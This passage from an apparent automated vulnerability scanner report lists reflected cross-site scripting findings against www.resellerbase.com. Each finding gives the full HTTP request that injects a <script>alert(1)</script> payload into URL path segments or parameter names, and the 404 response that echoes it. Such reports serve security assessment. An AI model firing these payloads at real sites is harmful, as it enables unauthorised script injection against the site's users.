<p>The requested URL /web-service876ce<script>alert(1)</script>f278be6c08a/web-hosting/themes/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.5549. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/3half.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 85513<script>alert(1)</script>d518a5d7b68 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting85513<script>alert(1)</script>d518a5d7b68/themes/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting85513<script>alert(1)</script>d518a5d7b68/themes/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.5550. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/3half.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d3869<script>alert(1)</script>c91f01ce0b5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themesd3869<script>alert(1)</script>c91f01ce0b5/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themesd3869<script>alert(1)</script>c91f01ce0b5/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.5551. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/3half.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 52189<script>alert(1)</script>0954e728f63 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos52189<script>alert(1)</script>0954e728f63/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos52189<script>alert(1)</script>0954e728f63/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.5552. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/3half.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 47d08<script>alert(1)</script>c7fb780f81f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images47d08<script>alert(1)</script>c7fb780f81f/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images47d08<script>alert(1)</script>c7fb780f81f/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.5553. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/3half.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload ba031<script>alert(1)</script>4b6db101ee was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/ratingba031<script>alert(1)</script>4b6db101ee/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/ratingba031<script>alert(1)</script>4b6db101ee/3half.gif was not found on this server.</p>
...[SNIP]...

2.5554. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/3half.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload eb4ee<script>alert(1)</script>a57a69e68c9 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/rating/3half.gifeb4ee<script>alert(1)</script>a57a69e68c9 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/rating/3half.gifeb4ee<script>alert(1)</script>a57a69e68c9 was not found on this server.</p>
...[SNIP]...

2.5555. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/3half.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/3half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e7b4c<script>alert(1)</script>32ff5b607c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/rating/3half.gif?e7b4c<script>alert(1)</script>32ff5b607c4=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/rating/3half.gif?e7b4c<script>alert(1)</script>32ff5b607c4=1 was not found on this server.</p>
...[SNIP]...

2.5556. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/4half.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1a931<script>alert(1)</script>f4d38f348ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service1a931<script>alert(1)</script>f4d38f348ee/web-hosting/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service1a931<script>alert(1)</script>f4d38f348ee/web-hosting/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.5557. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/4half.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9c3cc<script>alert(1)</script>41160c19fae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting9c3cc<script>alert(1)</script>41160c19fae/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting9c3cc<script>alert(1)</script>41160c19fae/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.5558. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/4half.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e0d7f<script>alert(1)</script>2721c7e7bdf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themese0d7f<script>alert(1)</script>2721c7e7bdf/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themese0d7f<script>alert(1)</script>2721c7e7bdf/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.5559. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/4half.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 75aed<script>alert(1)</script>6250f1d8c8b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos75aed<script>alert(1)</script>6250f1d8c8b/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos75aed<script>alert(1)</script>6250f1d8c8b/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.5560. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/4half.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload aa084<script>alert(1)</script>d6ee738c747 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/imagesaa084<script>alert(1)</script>d6ee738c747/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/imagesaa084<script>alert(1)</script>d6ee738c747/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.5561. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/4half.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 10584<script>alert(1)</script>9f2bf20e3e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/rating10584<script>alert(1)</script>9f2bf20e3e/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/rating10584<script>alert(1)</script>9f2bf20e3e/4half.gif was not found on this server.</p>
...[SNIP]...

2.5562. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/4half.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 39908<script>alert(1)</script>b2d1affee2c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/rating/4half.gif39908<script>alert(1)</script>b2d1affee2c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/rating/4half.gif39908<script>alert(1)</script>b2d1affee2c was not found on this server.</p>
...[SNIP]...

2.5563. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/4half.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/4half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3d354<script>alert(1)</script>c484224c22b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/rating/4half.gif?3d354<script>alert(1)</script>c484224c22b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/rating/4half.gif?3d354<script>alert(1)</script>c484224c22b=1 was not found on this server.</p>
...[SNIP]...

2.5564. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2b85e<script>alert(1)</script>922f5a08217 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service2b85e<script>alert(1)</script>922f5a08217/web-hosting/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service2b85e<script>alert(1)</script>922f5a08217/web-hosting/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5565. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 23bc4<script>alert(1)</script>7841efa4017 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting23bc4<script>alert(1)</script>7841efa4017/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting23bc4<script>alert(1)</script>7841efa4017/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5566. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c4af6<script>alert(1)</script>a87db5150b7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themesc4af6<script>alert(1)</script>a87db5150b7/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themesc4af6<script>alert(1)</script>a87db5150b7/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5567. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 38db3<script>alert(1)</script>90729673ba5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

